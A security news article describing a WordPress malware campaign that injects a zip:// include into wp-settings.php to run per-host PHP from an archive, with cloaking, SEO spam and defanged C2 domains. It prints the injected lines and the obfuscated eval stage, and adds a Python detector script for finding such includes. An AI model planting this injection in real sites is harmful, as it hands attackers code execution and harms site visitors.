Threat Actors Weaponize WordPress Websites to Redirect Visitors to Malicious Websites
Cybersecurity researchers have uncovered a malware campaign targeting WordPress websites through an unusual ZIP archive-based code inclusion mechanism.
The malware, first reported in July 2025, combines obfuscation with a stealthy persistence method to redirect unsuspecting visitors to malicious domains while simultaneously carrying out search engine optimization (SEO) poisoning.
The attack begins with the modification of a WordPress core file, specifically wp-settings.php, which WordPress loads on every request.
Once access is gained, the attackers inject code that uses PHP’s zip:// stream wrapper to include and execute a payload stored inside a ZIP archive.
This lets the malware evade scanners that only inspect standalone PHP files, because the malicious code lives inside an innocuous-looking archive named win.zip.
The malware’s objectives extend beyond simple redirection. It also attacks search engine rankings through unauthorized content injection, sitemap manipulation, and the creation of spam-laden pages designed to boost malicious websites in search results.
The infection distinguishes between human visitors and automated bots: search engine crawlers are served page content to index, while real users are redirected to malicious domains.
Sucuri analysts identified the malware after investigating persistent redirect issues reported by a client, leading to the discovery of this multi-layered threat.
The researchers noted that the malware selects its command-and-control (C2) server dynamically, activating different C2 domains depending on the URL path a visitor requests.
ZIP Archive Inclusion Mechanism
The malware’s most notable feature is its use of PHP’s zip:// stream wrapper for code inclusion. The initial payload, injected into wp-settings.php, consists of two lines that establish the infection framework:-
$h = str_replace('www.', '', $_SERVER['HTTP_HOST']); // request Host header with any leading "www." removed
include('zip://win.zip#' . $h);                      // include the archive entry named after that host
This code takes the hostname from the HTTP_HOST request header, strips any leading “www.”, and uses the result as the name of the entry to load from win.zip (the part after “#” in a zip:// path is the entry name). Because include() executes the stream it is given, the selected archive entry runs as PHP on every request; which entry runs depends on the host the request was made for, and the archive path is resolved relative to the working directory of the request.
The technique sidesteps scanners that only examine .php files on disk: the executable code sits inside a compressed container, and nothing about win.zip’s name or extension suggests PHP. A practical check is to search the codebase for include/require statements that reference zip:// (and other PHP stream wrappers such as phar:// or data://), and to treat any ZIP archive in the web root whose entries are named like hostnames as suspect.
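The following is an added example, not Sucuri’s code or part of the original report. It rebuilds the infection layout described above in a temporary directory (a constructed wp-settings.php carrying the two reported lines, plus a constructed win.zip with one placeholder entry per hostname) and then runs the check a responder would: find zip:// includes in PHP files, open the referenced archive, and flag entries that are named like hostnames, contain PHP, or carry common obfuscation markers. The entry contents and the marker list are assumptions made for the example, not the real payload.

```python
"""Added example: reproduce the zip:// inclusion layout and scan for it.

Everything here is constructed for illustration; the archive entries are
placeholder PHP, not the malware's real code.
"""
from __future__ import annotations

import re
import tempfile
import zipfile
from pathlib import Path

# Constructed stand-in for the two lines reported inside wp-settings.php.
INJECTED_SNIPPET = (
    "$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);\n"
    "include('zip://win.zip#' . $h);\n"
)

# include/require (and the *_once forms) of any zip:// stream path.
ZIP_INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]zip://", re.IGNORECASE
)
# Loose hostname shape: the malware keys archive entries by request host.
HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)([a-z0-9-]+\.)+[a-z]{2,}$", re.IGNORECASE)
# Assumed markers typical of obfuscated PHP droppers (heuristic, not a signature).
SUSPICIOUS_PHP = ("eval(", "base64_decode", "gzinflate", "str_rot13")


def build_fixture(root: Path) -> None:
    """Create a constructed WordPress-like tree with the infection layout."""
    (root / "wp-settings.php").write_text("<?php\n// ...core code...\n" + INJECTED_SNIPPET)
    (root / "wp-load.php").write_text("<?php\nrequire_once __DIR__ . '/wp-config.php';\n")
    with zipfile.ZipFile(root / "win.zip", "w") as zf:
        # One entry per victim hostname, named after the host with "www." stripped.
        zf.writestr("example.com", "<?php eval(base64_decode('...'));")
        zf.writestr("shop.example.net", "<?php echo eval(\"?>\" . $string1);")
        zf.writestr("README", "not php")  # benign entry, should not be flagged


def find_zip_includes(root: Path) -> list[tuple[str, int, str]]:
    """Return (file, line_no, line) for every include/require of a zip:// path."""
    hits = []
    for php in sorted(root.rglob("*.php")):
        for no, line in enumerate(php.read_text(errors="replace").splitlines(), 1):
            if ZIP_INCLUDE_RE.search(line):
                hits.append((str(php.relative_to(root)), no, line.strip()))
    return hits


def inspect_archive(archive: Path) -> dict[str, list[str]]:
    """Map each archive entry to the reasons it looks like a per-host payload."""
    findings: dict[str, list[str]] = {}
    with zipfile.ZipFile(archive) as zf:
        for info in zf.infolist():
            reasons = []
            if HOSTNAME_RE.match(info.filename):
                reasons.append("entry named like a hostname")
            body = zf.read(info).decode("utf-8", errors="replace")
            if body.lstrip().startswith("<?php"):
                reasons.append("entry is PHP source")
            reasons += [f"contains {m}" for m in SUSPICIOUS_PHP if m in body]
            if reasons:
                findings[info.filename] = reasons
    return findings


def scan(root: Path) -> dict:
    """Full check: zip:// includes in PHP, then the archives they reference."""
    includes = find_zip_includes(root)
    archives = {}
    for _, _, line in includes:
        m = re.search(r"zip://([^#'\"]+)", line)
        if m and (root / m.group(1)).exists():
            archives[m.group(1)] = inspect_archive(root / m.group(1))
    return {"includes": includes, "archives": archives}


def demo() -> dict:
    """Build the constructed fixture in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_fixture(root)
        return scan(root)


if __name__ == "__main__":
    result = demo()
    for path, no, line in result["includes"]:
        print(f"{path}:{no}: {line}")
    for archive, entries in result["archives"].items():
        for name, reasons in entries.items():
            print(f"{archive}#{name}: {', '.join(reasons)}")
```

On a real site, point scan() at the document root; the hostname heuristic is deliberately loose, so the PHP-source and obfuscation-marker findings are the ones to act on first.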
Upon extraction, the ZIP archive reveals heavily obfuscated PHP code whose final stage reduces to:-
// $b2, $b3 and $b4 hold function names assembled earlier in the obfuscated code (not shown)
$encode=$b3($string);
$string1=$b2($b4($encode));
echo eval("?>" . $string1);   // the leading "?>" drops eval() into HTML mode, so the decoded blob can carry its own <?php tags
The malware establishes persistence through environment manipulation, raising PHP’s execution time limit and implementing anti-bot detection so that crawlers and human visitors receive different responses.
It dynamically selects from multiple Command and Control servers, including domains such as wditemqy[.]enturbioaj[.]xyz and oqmetrix[.]icercanokt[.]xyz, depending on the requested URL path.
This distributed C2 architecture enhances the malware’s resilience against takedown efforts while enabling targeted content delivery based on visitor behavior patterns.